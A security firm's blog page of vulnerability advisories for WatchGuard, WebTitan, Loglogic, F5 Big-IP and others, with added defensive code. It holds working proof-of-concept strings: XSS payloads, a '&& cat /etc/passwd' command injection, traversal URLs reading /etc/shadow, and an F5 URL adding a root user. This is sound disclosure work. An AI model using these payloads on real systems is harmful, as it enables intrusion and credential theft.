Sec-1 Penetration Testing Workshop

Download the slides and supporting tools presented at the Sec-1 Penetration Testing Workshop:

Note: You will need to obtain the password from your account manager

Testing Workshop (Slides Only)

Slides and Tools

Posted in News | Comments Off

Advisory: Multiple WatchGuard Log and Report Manager Vulnerabilities

Sec-1 Security Advisory
Advisory Name : WatchGuard Log and Report Manager: Persistent Cross-Site-Scripting (XSS) Vulnerability
Release Date : 16/12/2011
Application : WSM 11.5.1 Log and Report Manager
Platform : Windows
Severity : HIGH. Persistent XSS
Author : Wayne Murphy
Vendor Status : Fixed in WSM 11.5.1 Update 1
Website : http://www.sec-1.com/blog
Vulnerability Summary:
Cross-site scripting vulnerabilities were discovered within the Log and Report Manager component of WatchGuard System Manager Version 11.5.1.

Version 11.5.1 introduced the new Log and Report Manager (web interface), replacing the older LogViewer, Report Manager and Reporting Windows client components. This web component introduced two types of cross-site scripting vulnerability: persistent and reflected. With the persistent XSS vulnerability it is possible to send traffic containing malicious scripts to a WatchGuard XTM Firebox firewall that is sending logs to a WatchGuard LogServer. When the logs are viewed within the new Log and Report Manager web UI, the malicious scripts execute, potentially allowing attackers to gain elevated privileges in the user's browser. The reflected XSS vulnerabilities allow an attacker to embed script code into maliciously formatted links; if the attacker entices the user to follow such a link, the embedded script code executes.

The following line is taken from WatchGuard's Release Notes for WSM 11.5.1 Update 1: "These vulnerabilities do not allow the attacker to gain access to your XTM appliance or change firewall rules, but could potentially allow the attacker to gain unauthorized access to your computer."
Exploit 1: Persistent XSS : FTP Method
Script code embedded within the FTP username value is insecurely stored in and retrieved from the database. Upon viewing the FTP log within Log and Report Manager, the embedded script code executes in the user's browser.

Example:

Entering the username value: <script>alert("Username_XSS")</script>

Embeds the following escaped log entry within the Watchguard LogServer Database:

command=USER \x3cscript\x3ealert(\x22Username_XSS\x22)\x3c/script\x3e

When the malicious log entry is viewed the embedded script code executes within the browser.

Exploit 1: Persistent XSS : SMTP Method
SMTP was also targeted during testing, since this service is more commonly encountered during real-world penetration testing. Furthermore, based on data collected from our firewall team, application-aware proxies (with logging enabled) are more likely to be used for SMTP traffic.
The WatchGuard SMTP-Proxy logs all headers that it strips from SMTP emails. By sending script code within an invalid SMTP header, the data is insecurely stored and retrieved by the application, allowing cross-site scripting attacks.
For example, submitting the following SMTP header via the WatchGuard SMTP service will embed JavaScript designed to display an alert box:

Bogus: \x3cscript\x3ealert(\x22XSS_Test_With_Encoding\x22)\x3c/script\x3e
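An added example, written for this page rather than taken from the advisory or from WatchGuard, of how a log viewer should treat entries like the FTP and SMTP ones above: it decodes the \xHH escaping shown in the LogServer entry, HTML-escapes the result before rendering, and flags stored entries that carry script markup so injection attempts can be found in existing logs. The sample entries are constructed from the two payloads in the advisory.

```python
import html
import re

# Constructed sample entries in the escaped form the advisory shows:
# the LogServer stores '<' as \x3c, '>' as \x3e and '"' as \x22.
SAMPLE_ENTRIES = [
    "command=USER anonymous",
    "command=USER \\x3cscript\\x3ealert(\\x22Username_XSS\\x22)\\x3c/script\\x3e",
    "Bogus: \\x3cscript\\x3ealert(\\x22XSS_Test_With_Encoding\\x22)\\x3c/script\\x3e",
]

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# Markup that has no business inside a log field: tags that can run script,
# inline event handlers and javascript: URLs.
_MARKUP = re.compile(
    r"<\s*/?\s*(script|img|iframe|svg|object|embed)\b|\bon\w+\s*=|javascript:",
    re.I,
)


def decode_log_escapes(entry: str) -> str:
    """Turn the stored \\xHH escapes back into the characters the client sent."""
    return _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), entry)


def render_log_entry(entry: str) -> str:
    """Text safe to place in an HTML log viewer: decode, then escape for HTML.

    The browser then shows the literal '<script>' instead of executing it.
    """
    return html.escape(decode_log_escapes(entry), quote=True)


def is_suspicious(entry: str) -> bool:
    """True if the entry carries HTML/script markup once decoded."""
    return _MARKUP.search(decode_log_escapes(entry)) is not None


def scan_entries(entries) -> list:
    """Return the stored entries a defender should look at."""
    return [e for e in entries if is_suspicious(e)]
```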

Exploit 2: Reflected XSS
The following two parameters were found to be vulnerable to reflected XSS attacks.

https://:4130/ - URL Parameter
https://:4130/auth/login - from_page Parameter
N.B. Modern browsers were unable to exploit the URL Parameter attack vector. An intercepting proxy had to be used to exploit this successfully.
Vendor Response:
The vendor has patched these issues in WSM Version 11.5.1 Update 1. A WatchGuard advisory has been released relating to these vulnerabilities:

http://watchguardsecuritycenter.com/2011/12/15/watchguard-releases-wsm-v11-5-1-update-1-xss-flaws-corrected/

Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : CVE-2011-4774
Copyright 2011 Sec-1 LTD. All rights reserved.

Advisory: Multiple Splunk Vulnerabilities

Sec-1 Security Advisory
Advisory Name : Splunk Multiple Vulnerabilities
Release Date : 14/12/2012
Application : Splunk 4.2.4, 4.2.3 and 4.2.2 tested
Platform : Windows & Linux
Severity : Remote Compromise (root)
Author : Gary O’Leary-Steele
Vendor Status : Fixed in 4.2.5
Website : http://www.sec-1.com/blog
Vulnerability Summary:
Multiple vulnerabilities were discovered that could be exploited to gain remote code execution as the root/localsystem user. A full description of the discovered vulnerabilities can be found here: Download
Exploit:
Exploit code designed for use in penetration testing can be downloaded here: Download
Vendor Response:
The vendor has patched the issue in version 4.2.5. Sec-1 would like to thank Splunk for their prompt and professional response.
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : See PDF
Copyright 2011 Sec-1 LTD. All rights reserved.

Advisory: WebTitan Multiple Vulnerabilities

Sec-1 Security Advisory
Advisory Name : WebTitan Multiple Vulnerabilities
Release Date : 19/10/2011
Application : WebTitan version 3.50 (Build 183)
Platform : VMWare Appliance
Severity : SQL injection, Command injection, Dir Traversal
Author : Richard Conner
Vendor Status : Fixed in Version 3.60
Website : http://www.sec-1.com/blog
Product Overview:
Taken from: http://www.webtitan.com/products

WebTitan is a complete internet monitoring software (web filter) which provides organisations protection for their data from malware and other internet threats such as viruses, spyware and phishing as well as providing user policy browsing tools to ensure corporate internet policy is adhered to.
Vulnerability Summary:
A number of security issues were identified in version 3.50 (Build 183). A SQL injection attack within the authentication component can be leveraged to recover the password hashes of valid users. Once authenticated access is obtained further attacks exist. Additional SQL injection, Command Injection providing access to the FreeBSD O/S and a Directory Traversal flaw can be exploited.
Exploit 1: PRE Auth – Blind SQL Injection
The following vulnerability was identified

Login Page: http://172.31.1.25/login.php

This vulnerable component can be accessed without authenticating. The affected script provides a web interface to the authentication component of the application. From here it is possible to perform any administrative task, including user administration and running diagnostics.

Vulnerable Script: /login-x.php

Vulnerable POST request:
jaction=login&language=en_US&username=admin&password=hiadmin
Vulnerable Parameter: username
Database: POSTGRES

It is possible to perform blind SQL injection within the username parameter to recover the contents of various tables from the public database, including the admin table which contains the usernames and a MD5 hash of the password for each administrative account.

Exploit 2: POST Auth – SQL Injection
Once authenticated, either by exploiting the pre-auth SQL injection flaw or through a known administrative account (default values, brute force, etc.), it is possible to perform several further SQL injection attacks against the following:

Vulnerable Script: /urls-x.php

Vulnerable POST Parameters: bldomain, wldomain, temid

Exploit 3: POST Auth – Command Injection
The Traceroute or Ping functionality, when issued by an authenticated user, can be abused to make the script execute an additional command. Appending two ampersand (&&) characters to the Ping or Traceroute target causes the script to execute the following text as a second command. The returned data is displayed within the diagnostic message in the user's web browser.

Example:

http://172.31.1.25/tools.php#tab0

127.0.0.1 && cat /etc/passwd

Will display the contents of the password file which lists the FreeBSD users and their privileges.
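An added example (not WebTitan's code) of how a ping/traceroute diagnostic should be built so that the && trick above has nothing to act on: the target is accepted only if it is a literal IP address or a well-formed hostname, and the command runs as an argv list with no shell, so shell operators are never interpreted. The tool names and argument layout are assumptions for the example.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no leading or trailing hyphen, at most 253 characters in total.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def validate_target(target: str) -> bool:
    """Accept only a literal IP address or a well-formed hostname.

    Anything else (spaces, '&&', ';', '|', backticks, '$(' ...) is rejected
    before it gets anywhere near a command line.
    """
    target = target.strip()
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return _HOSTNAME.match(target) is not None


def build_diag_argv(tool: str, target: str, count: int = 4) -> list:
    """Build the argv list for ping or traceroute; raise ValueError otherwise."""
    if tool not in ("ping", "traceroute"):
        raise ValueError("unsupported diagnostic tool")
    if not validate_target(target):
        raise ValueError("target is not an IP address or hostname")
    target = target.strip()
    if tool == "ping":
        return ["ping", "-c", str(int(count)), target]
    return ["traceroute", target]


def run_diag(tool: str, target: str) -> str:
    """Run the diagnostic with no shell: each argv element reaches the program
    verbatim, so '&&' could only ever be part of an (invalid) hostname.
    The caller must still HTML-escape the output before displaying it."""
    proc = subprocess.run(build_diag_argv(tool, target), capture_output=True,
                          text=True, timeout=30)
    return proc.stdout + proc.stderr
```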

Exploit 4: POST Auth – Dir Traversal
Example:

http://[HOST_IP]//logs-x.php?jaction=view&fname=../../../../../etc/passwd

Vendor Response:
These issues were resolved in version 3.60.
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : CVE-2011-4638 (SQL Injection Issues)
CVE : CVE-2011-4639 (POST Auth. Command Injection Issues)
CVE : CVE-2011-4640 (POST Auth. Dir Traversal)
Copyright 2011 Sec-1 LTD. All rights reserved.

Advisory: Loglogic 5.1 Directory Traversal

Sec-1 Security Advisory
Advisory Name : Loglogic 5.1 Directory Traversal
Release Date : 06/06/2011
Application : MX3020-PCI Edition / MX Virtual Appliance
Platform : Linux / Appliance
Severity : Remote Compromise (root)
Author : Gary O’Leary-Steele
Vendor Status : Fixed in HF-3 for version 5.1
Website : http://www.sec-1.com/blog
Vulnerability Summary:
A directory traversal vulnerability was identified within the Loglogic web interface. The vulnerability could be exploited by an unauthenticated attacker to gain access to any file on the local file system. For example, the attacker could extract the local /etc/shadow file and launch an offline password attack to recover the root password. Successful exploitation of this vulnerability could provide full control over the affected log management device including any stored reports and log files.
Exploit:
The following URL will download the /etc/shadow file:

https://[IP]/logapp20/downloadreportzip?file=/../../../../../../../etc/shadow
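An added example (not from WebTitan, Loglogic or Sec-1) that serves both the fname parameter in the WebTitan advisory above and the file parameter in this Loglogic advisory: the containment check a download handler should apply before opening a file, and a detector run over constructed access-log lines that flags traversal attempts whether or not they are URL-encoded. LOG_DIR and the log lines are constructed for the example.

```python
import os
import re
from urllib.parse import unquote

# Constructed base directory the download handler is allowed to serve from.
LOG_DIR = "/srv/webtitan/logs"


def safe_resolve(base_dir: str, requested: str):
    """Resolve a user-supplied file name inside base_dir, or return None.

    A leading '/' is treated as relative to base_dir. The joined path is
    canonicalised (symlinks and '..' collapsed) and accepted only if it is
    still inside base_dir; the prefix test uses commonpath so that a sibling
    such as base_dir + '-old' is not mistaken for base_dir itself.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Constructed access-log lines shaped like the requests in the two advisories.
SAMPLE_LOG = [
    'GET /logs-x.php?jaction=view&fname=today.log HTTP/1.1" 200',
    'GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1" 200',
    'GET /logapp20/downloadreportzip?file=%2F..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200',
    'GET /logapp20/downloadreportzip?file=report42.zip HTTP/1.1" 200',
]

_TRAVERSAL = re.compile(r"\.\.[/\\]")


def find_traversal_attempts(lines) -> list:
    """Return the log lines containing a '../' (or '..\\') segment after
    URL-decoding twice, so single- and double-encoded forms are both caught."""
    return [line for line in lines if _TRAVERSAL.search(unquote(unquote(line)))]
```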

Vendor Response:
The vendor has patched the issue in HF-3 for version 5.1.
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : CVE-2011-2781
Copyright 2011 Sec-1 LTD. All rights reserved.

Advisory: F5 Networks Big-IP Multiple Vulnerabilities

Sec-1 Security Advisory
Advisory Name : F5 Networks Big-IP Multiple Vulnerabilities
Release Date : 04/07/2011
Application : F5 Networks Big-IP 10.1.0
Platform : Local Traffic Manager Virtual Edition (tested)
Severity : Privilege Escalation (to root), CSRF and XSS
Author : Gary O’Leary-Steele
Vendor Status : Patch Released
Website : http://www.sec-1.com/blog
Product Overview:
Taken from: http://www.f5.com/products/big-ip/

The BIG-IP product family is a system of integrated application delivery services that work together on the same best-in-class hardware. From load balancing, SSL offload, and web acceleration to application security, access control, and much more, a single BIG-IP device can do the work of a dozen single-purpose appliances.

Local Traffic Manager Virtual Edition enables you to create a mobile, scalable, and adaptable infrastructure for virtualized applications by applying the functionality of BIG-IP LTM in a virtualized environment.

Vulnerability Summary:
A number of security issues were identified within the management web interface that could be combined to gain unauthorised root access to the affected system. Identified vulnerabilities include Privilege Escalation, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF/XSRF).
Vulnerability Details – Privilege Escalation:
The following vulnerable script was identified during an analysis of the local file system:

https://[TARGET_IP]/tmui/tools/dbeditor.jsp

To access this component the user must be authenticated to the web interface as any user (including guest). The affected script provides a web interface to the underlying database along with easy-to-use templates to change database data. From here it is possible to perform any administrative task, including user administration.

From an attacker's perspective this interface allows any user, including Guest, to administer any aspect of the Big-IP's configuration.

Exploit Example 1:
The following URL, when accessed by any authenticated user, will add a root-equivalent user "hacker2" with a password of "admin" to the affected Big-IP system (it adds an entry to /etc/shadow):

https://[TARGET_IP]/tmui/tools/commandresults.jsp?sql=INSERT into userdb_entry value('hacker2',12345,'$1$vj2xXJiEZC0aIA.IBj5rvaEfbDgr0','true','',0,0,'/home/hacker2','/bin/sh',0,'','false','all')

This vulnerability could be exploited using common Cross-Site Request forgery techniques such as an embedded IMG tag.

Exploit Example 2:
The following URL will extract password hashes from the /etc/shadow file:

https://[TARGET_IP]/tmui/tools/commandresults.jsp?sql=select * from userdb_entry
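An added example (not F5's code) of the two checks whose absence the findings above illustrate: a management endpoint that executes SQL must be restricted to administrators rather than any authenticated user, and it must only act on POST requests carrying a per-session CSRF token, so a GET triggered by an embedded IMG tag cannot run the INSERT shown in Example 1. Role names and the audit record format are assumptions for the example.

```python
import hmac
import secrets

ADMIN_ROLES = {"admin"}
AUDIT_LOG = []   # constructed in-memory audit trail; a real system writes to syslog


def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the session; forms embed it in a hidden field."""
    session["csrf"] = secrets.token_hex(16)
    return session["csrf"]


def authorize_sql_request(session: dict, method: str, sql: str, csrf_token) -> tuple:
    """Decide whether a request to a SQL-executing management endpoint may run.

    Checks, in order: the caller holds an administrative role (a guest must
    never reach the database tool, not even for SELECT); the request is a
    POST, since a GET can be fired by an <img> tag on any page the admin
    visits; and the submitted CSRF token matches the one bound to the session
    (constant-time compare). Returns (allowed, reason) and records the decision.
    """
    decision = (True, "ok")
    if session.get("role") not in ADMIN_ROLES:
        decision = (False, "role not permitted")
    elif method.upper() != "POST":
        decision = (False, "must be POST")
    else:
        expected = session.get("csrf") or ""
        supplied = str(csrf_token or "")
        if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
            decision = (False, "missing or invalid CSRF token")
    AUDIT_LOG.append({"user": session.get("user"), "role": session.get("role"),
                      "method": method.upper(), "sql": sql, "allowed": decision[0]})
    return decision
```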

Vulnerability Details – Cross Site Scripting:
Errors returned by the affected script(s) are written to the page without encoding and can therefore be exploited to perform an XSS attack. Furthermore, since the resulting error can be constructed using SQL it is possible to form a payload that will bypass local XSS filters.
Exploit Example 3:
https://[TARGET_IP]/tmui/tools/commandresults.jsp?sql=select%20name,passwd%20from%20userdb_entry%20union%20select%20%27%3Cscript%3Ealert%281%29%3C/script%3E%27,%27b%27%20from%20userdb_entry
Vendor Response:
This issue was resolved in version 10.2.2 and within the hotfix release 10.2.1-hf1.
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : CVE-2011-3121
Copyright 2011 Sec-1 LTD. All rights reserved.

Tool: Blind SQL Injection exploit tool

Sec-1 Blind Injector (sec1blindinjector.rb)

The sec1blindinjector.rb tool is designed to exploit blind SQL injection vulnerabilities in Microsoft SQL Server based applications. Whilst there are many good tools already out there such as SQLMap, this tool offers a number of unique features we have found useful during penetration testing.

Features

  • Search tables for columns names containing a specific key word (e.g. password)
  • Search all tables and databases for columns containing specific data (e.g admin)
  • Enumerate table and column names
  • Extract table data
  • Perform a dictionary attack against the local or accessible SQL server (SQL server 2000 only)
  • Execute operating system commands via cracked “sa” account

Download here: sec1blindinjector


Tool: Identify vulnerable share permissions to prevent data leakage

Windows File Sharing Vulnerabilities

Windows file sharing permissions are based on the popular Discretionary Access Control (DAC) model, which essentially means that the owner of the resource uses his or her discretion when deciding who should be permitted access. Access is granted either to an individual user or to a group of users. Unfortunately, file shares are rarely configured with security as a top priority and the path of least resistance is often taken. Vulnerabilities commonly arise when access to a confidential resource is granted to a group containing users who should not be permitted to access it, or when a generalised group such as "Everyone" has erroneously been included.

Download: ShareCheck

Sec-1 ShareCheck

Sec-1 ShareCheck was written during a penetration test to assess a given IP address range for weak file share permissions. The output of the tool is an HTML table containing:

  • The IP Address
  • Account Lockout Threshold
  • A list of Local Administrators
  • Shares which the supplied user can access
  • Shares which the supplied user can write to

In the course of a penetration test local administrator accounts could then be targeted in an attempt to compromise the host and network.

Usage

ShareCheck is a command line tool written in Python.

To use ShareCheck configure a user account with limited permissions, i.e. a regular user. The results of running ShareCheck will illustrate what this user can and cannot access.

Command line example:

Assess the IP range 192.168.0.1-254 using the username "Bob" and the password "datastealer", saving the results in report.html:

sharecheck.exe 192.168.1.0/24 bob datastealer report.html

Paper: Buffer Truncation Abuse in Microsoft SQL Server Based Applications

This paper is designed to document an attack technique Sec-1 recently adopted during the course of their application assessments. The basic principle of this technique has existed for some time; however, we hope this paper will provide an insight into how a variation of the technique can be adopted to attack common forgotten-password functionality within web applications.

The document is split into two sections. The first section covers the principles of the technique and the second is an attack case study against a commercial application.

Download: Buffer Truncation Abuse Paper


Advisory: Collaboration Data Objects Buffer Overflow Vulnerability

                                SEC-1 LTD.
                              www.sec-1.com

Collaboration Data Objects Buffer Overflow Vulnerability
Application: Multiple Applications that implement CDO
Platform: Windows
Severity: Critical. Remote Code Execution
Author: Gary O'Leary-Steele
Vendor Status: Patch Released
CVE Candidate: CAN-2005-1987
Reference: http://www.sec-1.com
Disclosed: 12/October/2005
Vulnerability Details:

Sec-1 has identified an exploitable buffer overflow within Collaboration Data
Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when event sinks
are used within Microsoft Exchange 2000 or Microsoft Mail services to parse
email content. Several content security packages were identified to be vulnerable.
The vulnerability can be exploited by crafting an email with a large header
name such as "Content-Type<LARGE STRING>:". A failure to correctly determine
the length of the string results in a stack overflow. Successful exploitation
of the vulnerability could allow the attacker to gain complete control of the
vulnerable host. In some cases the vulnerability can also be used to bypass
content security mechanisms such as virus and content scanners.
http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx
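An added example (not Sec-1's exploit and not Microsoft's fix) of a mail-gateway check for the malformed header the advisory describes: it walks the raw header block, unfolds continuation lines, and rejects any message whose header name is longer than a sane limit or contains characters RFC 5322 does not permit in a field name. The size limits and sample messages are constructed for the example.

```python
import re

# Assumed gateway policy limits (not from the advisory): real header names are a
# few dozen bytes at most; RFC 5322 caps a line at 998 bytes.
MAX_HEADER_NAME = 80
MAX_HEADER_VALUE = 998

# RFC 5322 field-name: printable US-ASCII except ':' (0x3a) and space.
_FIELD_NAME = re.compile(r"^[\x21-\x39\x3b-\x7e]+$")


def split_headers(raw: bytes) -> list:
    """Return (name, value) pairs from the header block of a raw message,
    unfolding continuation lines. Parsing stops at the first blank line."""
    head = raw.split(b"\r\n\r\n", 1)[0].replace(b"\r\n", b"\n")
    fields = []
    for line in head.split(b"\n"):
        if not line:
            continue
        if line[:1] in (b" ", b"\t") and fields:
            name, value = fields[-1]          # folded continuation line
            fields[-1] = (name, value + b" " + line.strip())
            continue
        name, _, value = line.partition(b":")
        fields.append((name, value.strip()))
    return fields


def header_problems(raw: bytes) -> list:
    """List reasons to reject the message's header block; [] means clean."""
    problems = []
    for name, value in split_headers(raw):
        if len(name) > MAX_HEADER_NAME:
            problems.append(f"header name of {len(name)} bytes exceeds {MAX_HEADER_NAME}")
        elif not _FIELD_NAME.match(name.decode("ascii", "replace")):
            problems.append(f"illegal header name {name[:20]!r}")
        if len(value) > MAX_HEADER_VALUE:
            problems.append(f"value of {name[:20]!r} exceeds {MAX_HEADER_VALUE} bytes")
    return problems


# Constructed samples: a normal message and one whose header name is padded in
# the "Content-Type<LARGE STRING>:" shape the advisory describes.
GOOD_MSG = b"From: a@example.test\r\nContent-Type: text/plain\r\n\r\nhello\r\n"
BAD_MSG = (b"From: a@example.test\r\nContent-Type" + b"A" * 4096
           + b": text/plain\r\n\r\nhello\r\n")
```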
Exploit Download: cdo_exploit